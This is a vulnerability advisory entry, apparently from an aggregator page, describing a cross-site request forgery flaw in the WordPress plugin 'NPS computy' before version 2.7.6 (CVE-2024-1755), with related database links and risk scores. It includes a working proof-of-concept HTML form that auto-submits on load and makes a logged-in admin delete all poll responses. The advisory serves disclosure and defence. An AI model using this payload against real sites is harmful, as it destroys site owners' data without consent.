Lucene search
Bob MatyasWPEX-ID:481A376B-55BE-4AFA-94F5-C3CF8A88B8D1HistoryMar 25, 2024 - 12:00 a.m.
NPS computy < 2.7.6 - Results Deletion via CSRF
2024-03-2500:00:00
Bob Matyas
21
nps
version 2.7.6
cross-site request forgery
results deletion
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open the following:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=nps-plugin-options" method="POST">
<input type="text" id="event" name="event" value='delete_all'>
<input type="submit" value="submit" name="add">
</form>
</body>
```
The result is that all existing poll responses are deleted.Related
nvd
nvd
CVE-2024-1755
2024-04-15 05:15:15
cvelist
cvelist
CVE-2024-1755 NPS computy <= 2.7.5 - Results Deletion via CSRF
2024-04-15 05:00:04
cve
cve
CVE-2024-1755
2024-04-15 05:15:15
wpvulndb
wpvulndb
NPS computy < 2.7.6 - Results Deletion via CSRF
2024-03-25 00:00:00
wordfence
wordfence
9.5 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%
Related for WPEX-ID:481A376B-55BE-4AFA-94F5-C3CF8A88B8D1